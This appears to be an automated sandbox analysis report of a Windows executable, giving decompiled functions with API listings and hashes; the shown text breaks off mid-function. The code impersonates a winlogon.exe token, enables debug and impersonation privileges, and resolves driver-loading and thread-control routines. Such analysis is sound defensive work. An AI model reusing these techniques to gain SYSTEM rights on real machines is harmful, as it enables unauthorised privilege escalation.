                                                                                      • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                      • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                      • API String ID: 3201562063-2355939583
                                                                                      • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                      • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                      • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                      • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00409921(struct HINSTANCE__** __esi) {
                                                                                      				void* _t6;
                                                                                      				struct HINSTANCE__* _t7;
                                                                                      				_Unknown_base(*)()* _t12;
                                                                                      				CHAR* _t13;
                                                                                      				intOrPtr* _t17;
                                                                                      
                                                                                      				if( *__esi == 0) {
                                                                                      					_t7 = E00405436(L"psapi.dll"); // executed
                                                                                      					 *_t17 = "GetModuleBaseNameW";
                                                                                      					 *__esi = _t7;
                                                                                      					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                      					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                      					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                      					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                      					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                      					__esi[3] = _t12;
                                                                                      					return _t12;
                                                                                      				}
                                                                                      				return _t6;
                                                                                      			}









                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 1529661771-70141382
                                                                                      • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                      • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                      • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                      • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                      • String ID:
                                                                                      • API String ID: 2827331108-0
                                                                                      • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                      • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                      • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                      • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                      				int _v8;
                                                                                      				void _v538;
                                                                                      				long _v540;
                                                                                      				void _v1066;
                                                                                      				char _v1068;
                                                                                      				long _t30;
                                                                                      				int _t33;
                                                                                      				int _t39;
                                                                                      				void* _t42;
                                                                                      				void* _t45;
                                                                                      				long _t49;
                                                                                      
                                                                                      				_t45 = __edx;
                                                                                      				_v540 = 0;
                                                                                      				memset( &_v538, 0, 0x208);
                                                                                      				_v1068 = 0;
                                                                                      				memset( &_v1066, 0, 0x208);
                                                                                      				E00404C3C( &_v540);
                                                                                      				_t48 = L"winlogon.exe";
                                                                                      				_t39 = wcslen(L"winlogon.exe");
                                                                                      				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                      				_t53 = _t39 + _t8 - 0x104;
                                                                                      				_pop(_t42);
                                                                                      				if(_t39 + _t8 >= 0x104) {
                                                                                      					_v1068 = 0;
                                                                                      				} else {
                                                                                      					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                      					_pop(_t42);
                                                                                      				}
                                                                                      				_v8 = 0;
                                                                                      				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                      				_t49 = _t30;
                                                                                      				_t54 = _t49;
                                                                                      				if(_t49 == 0) {
                                                                                      					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                      					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                      					if(_t33 == 0) {
                                                                                      						_t49 = GetLastError();
                                                                                      					}
                                                                                      					CloseHandle(_v8);
                                                                                      				}
                                                                                      				return _t49;
                                                                                      			}















                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00401F27
                                                                                      • memset.MSVCRT ref: 00401F3F
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                      • wcslen.MSVCRT ref: 00401F5A
                                                                                      • wcslen.MSVCRT ref: 00401F69
                                                                                      • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                        • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                        • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                      • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                      • API String ID: 3867304300-2177360481
                                                                                      • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                      • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                      • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                      • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                      				int _t8;
                                                                                      				struct HINSTANCE__* _t9;
                                                                                      
                                                                                      				if( *0x41c8e8 == 0) {
                                                                                      					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                      					if(_t9 != 0) {
                                                                                      						 *0x41c8e8 = 1;
                                                                                      						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                      					}
                                                                                      				}
                                                                                      				if( *0x41c8ec == 0) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                      					return _t8;
                                                                                      				}
                                                                                      			}






                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                      • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                      • API String ID: 1714573020-3385500049
                                                                                      • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                      • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                      • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                      • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 84%
                                                                                      			E00402F31(void* _a4) {
                                                                                      				void _v530;
                                                                                      				long _v532;
                                                                                      				void* __edi;
                                                                                      				wchar_t* _t15;
                                                                                      				intOrPtr _t18;
                                                                                      				short* _t19;
                                                                                      				void* _t22;
                                                                                      				void* _t29;
                                                                                      
                                                                                      				_v532 = _v532 & 0x00000000;
                                                                                      				memset( &_v530, 0, 0x208);
                                                                                      				E00404AD9( &_v532);
                                                                                      				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                      				if(_t15 != 0) {
                                                                                      					 *_t15 =  *_t15 & 0x00000000;
                                                                                      				}
                                                                                      				wcscat( &_v532, L".cfg");
                                                                                      				_t18 =  *0x40fa74; // 0x4101c8
                                                                                      				_t19 = _t18 + 0x5504;
                                                                                      				_t36 =  *_t19;
                                                                                      				_pop(_t29);
                                                                                      				if( *_t19 != 0) {
                                                                                      					E00404923(0x104,  &_v532, _t19);
                                                                                      					_pop(_t29);
                                                                                      				}
                                                                                      				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
                                                                                      				return _t22;
                                                                                      			}












                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402F51
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • wcsrchr.MSVCRT ref: 00402F6F
                                                                                      • wcscat.MSVCRT ref: 00402F8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                      • String ID: .cfg
                                                                                      • API String ID: 776488737-3410578098
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 35%
                                                                                      			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                      				char _v16390;
                                                                                      				short _v16392;
                                                                                      				void* __edi;
                                                                                      				intOrPtr* _t30;
                                                                                      				intOrPtr* _t34;
                                                                                      				signed int _t36;
                                                                                      				signed int _t37;
                                                                                      
                                                                                      				_t30 = __ecx;
                                                                                      				E0040B550(0x4004, __ecx);
                                                                                      				_push(0x4000);
                                                                                      				_push(0);
                                                                                      				_v16392 = 0;
                                                                                      				_t34 = _t30;
                                                                                      				_push( &_v16390);
                                                                                      				if(_a4 == 0) {
                                                                                      					memset();
                                                                                      					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
                                                                                      					asm("sbb esi, esi");
                                                                                      					_t37 =  ~_t36;
                                                                                      					E004051B8( &_v16392, _t34, _a16);
                                                                                      				} else {
                                                                                      					memset();
                                                                                      					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                      					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                      				}
                                                                                      				return _t37;
                                                                                      			}











                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00409E08
                                                                                        • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                        • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                      • memset.MSVCRT ref: 00409E3B
                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1127616056-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                      				void* _t8;
                                                                                      				void* _t13;
                                                                                      				signed int _t16;
                                                                                      				void** _t21;
                                                                                      				signed int _t22;
                                                                                      
                                                                                      				_t21 = __edi;
                                                                                      				_t22 =  *__eax;
                                                                                      				if(__edx < _t22) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					_t13 =  *__edi;
                                                                                      					do {
                                                                                      						_t1 =  &_a8; // 0x4057e1
                                                                                      						 *__eax =  *__eax +  *_t1;
                                                                                      						_t16 =  *__eax;
                                                                                      					} while (__edx >= _t16);
                                                                                      					_t8 = malloc(_t16 * _a4); // executed
                                                                                      					 *__edi = _t8;
                                                                                      					if(_t22 > 0) {
                                                                                      						if(_t8 != 0) {
                                                                                      							memcpy(_t8, _t13, _t22 * _a4);
                                                                                      						}
                                                                                      						free(_t13); // executed
                                                                                      					}
                                                                                      					return 0 |  *_t21 != 0x00000000;
                                                                                      				}
                                                                                      			}









                                                                                      APIs
                                                                                      • malloc.MSVCRT ref: 0040496D
                                                                                      • memcpy.MSVCRT ref: 00404985
                                                                                      • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: freemallocmemcpy
                                                                                      • String ID: W@
                                                                                      • API String ID: 3056473165-1729568415
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405436(wchar_t* _a4) {
                                                                                      				void _v2050;
                                                                                      				signed short _v2052;
                                                                                      				void* __esi;
                                                                                      				struct HINSTANCE__* _t16;
                                                                                      				WCHAR* _t18;
                                                                                      
                                                                                      				_v2052 = _v2052 & 0x00000000;
                                                                                      				memset( &_v2050, 0, 0x7fe);
                                                                                      				E00404C3C( &_v2052);
                                                                                      				_t18 =  &_v2052;
                                                                                      				E004047AF(_t18);
                                                                                      				wcscat(_t18, _a4);
                                                                                      				_t16 = LoadLibraryW(_t18); // executed
                                                                                      				if(_t16 == 0) {
                                                                                      					return LoadLibraryW(_a4);
                                                                                      				}
                                                                                      				return _t16;
                                                                                      			}









                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                        • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                        • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                      • wcscat.MSVCRT ref: 00405478
                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 3725422290-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                        • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                        • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                        • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                      • String ID:
                                                                                      • API String ID: 4232544981-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                      				signed int _v8;
                                                                                      				void* _t8;
                                                                                      				void* _t13;
                                                                                      
                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                      				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                      				_t13 = _t8;
                                                                                      				if(_v8 != 0) {
                                                                                      					FreeLibrary(_v8);
                                                                                      				}
                                                                                      				return _t13;
                                                                                      			}







                                                                                      APIs
                                                                                        • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                        • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                      • String ID:
                                                                                      • API String ID: 187924719-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 37%
                                                                                      			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t6;
                                                                                      				void* _t8;
                                                                                      				struct HINSTANCE__** _t10;
                                                                                      
                                                                                      				_t10 = __eax;
                                                                                      				E00409921(__eax);
                                                                                      				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                      				if(_t6 == 0) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                      				return _t8;
                                                                                      			}








                                                                                      APIs
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                      Similarity
                                                                                      • API ID: AddressProc$FileModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 3859505661-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004095DA(signed int* __edi) {
                                                                                      				void* __esi;
                                                                                      				struct HINSTANCE__* _t3;
                                                                                      				signed int* _t7;
                                                                                      
                                                                                      				_t7 = __edi;
                                                                                      				_t3 =  *__edi;
                                                                                      				if(_t3 != 0) {
                                                                                      					FreeLibrary(_t3); // executed
                                                                                      					 *__edi =  *__edi & 0x00000000;
                                                                                      				}
                                                                                      				E004099D4( &(_t7[0xa]));
                                                                                      				return E004099D4( &(_t7[6]));
                                                                                      			}







                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                      
                                                                                      				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                      				return 1;
                                                                                      			}




                                                                                      APIs
                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                      Similarity
                                                                                      • API ID: EnumNamesResource
                                                                                      • String ID:
                                                                                      • API String ID: 3334572018-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      C-Code - Quality: 100%
                                                                                      			E00408E31() {
                                                                                      				void* _t1;
                                                                                      				struct HINSTANCE__* _t2;
                                                                                      				_Unknown_base(*)()* _t14;
                                                                                      
                                                                                      				if( *0x41c4ac == 0) {
                                                                                      					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                      					 *0x41c4ac = _t2;
                                                                                      					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                      					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                      					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                      					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                      					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                      					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                      					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                      					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                      					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                      					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                      					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                      					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                      					 *0x41c4a8 = _t14;
                                                                                      					return _t14;
                                                                                      				}
                                                                                      				return _t1;
                                                                                      			}







                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                      • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                      • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                      • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                      • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                      • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                      • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                      • API String ID: 667068680-4280973841
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 70%
                                                                                      			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                      				char _v8;
                                                                                      				long _v12;
                                                                                      				long _v16;
                                                                                      				long _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				long _v28;
                                                                                      				char _v564;
                                                                                      				char _v16950;
                                                                                      				char _v33336;
                                                                                      				_Unknown_base(*)()* _v33348;
                                                                                      				_Unknown_base(*)()* _v33352;
                                                                                      				void _v33420;
